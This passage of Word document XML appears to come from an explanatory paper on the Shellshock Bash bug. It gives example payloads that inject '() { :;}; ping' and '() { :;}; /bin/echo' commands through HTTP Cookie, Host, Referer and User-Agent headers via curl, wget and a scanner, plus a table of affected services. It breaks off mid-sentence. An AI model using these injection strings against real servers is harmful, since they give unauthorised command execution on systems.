    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http-user-agent=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shellshock-scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>header[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cookie] = () { :; }; ping -c 3 209.126.230.74</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>header[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Host] =() { :;}; ping -c 3 209.126.230.74</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>header[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>] = { :;}; ping -c 3 209.126.230.74</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Moreover, despite the fact the HTTP_USER_AGENT variables are usually detected correctly by software such as browsers, there are plenty of tools that could be used to provide customized variables. For i</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">stance, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and curl both provide options that can be used to construct any kind of HTTP_USER_AGENT variables, including illegal one. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$curl -H “User-Agent: () </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">;}; /bin/echo test” </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://example.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -U “() </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">;}; /bin/echo test” </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://example.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Browsers such as Safari also provide this function. Experienced programmers can write higher level pr</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">grams that allows even more powerful attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Besides the HTTP server variables, many other programs also allow the usage of remotely pr</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">vided environmental variables. Thus, the bottom line </w:t>
      </w:r>
      <w:r w:rsidR="00152D15" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00152D15">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">any program </w:t>
      </w:r>
      <w:r w:rsidR="00152D15">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> may interact with Bash and spawn child process in subshell is vulnerable to Shellshock bugs.  Some typical such operations are listed in the following table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4AF6" w:rsidRDefault="004B4AF6">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B4AF6" w:rsidRPr="004B4AF6" w:rsidRDefault="004B4AF6">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 1.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Examples of programs that affected by Shellshock</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal1"/>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2236"/>
        <w:gridCol w:w="2469"/>
        <w:gridCol w:w="4650"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:trPr>
          <w:trHeight w:val="490"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2235"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F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle3"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Programs/Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246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F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle3"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650"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F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle3"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Typical trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2235"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Apache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2469"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mod_cgi,mod_cgid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650"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4B4AF6">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">Bash, </w:t>
            </w:r>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>C(system/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>), P</w:t>
            </w:r>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>y</w:t>
            </w:r>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>thon(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>os.system</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>os.popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>), PHP(system/exec), Perl(open/system)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="485"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="223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DHCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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DHCP client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="465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8E193C">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>ash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="223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Git</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>/Subversion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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shell scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="465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8E193C">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>ash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="485"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="223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OpenSSH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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ForceCommand</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="465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8E193C">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>ash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="485"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="223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SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246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rsidP="001D3362">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Qmail</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="465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8E193C">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>ash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/Subversion server case, these programs are usually safe because they are in the r</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stricted shell environment. Even successful infiltration does not engender appreciable damage because no arbitrary commands can be executed under such restriction. However, the Shellshock vulnerability</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 xml:space="preserve">could help the attacker bypass the restriction. The following command is a demonstration of attacking </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
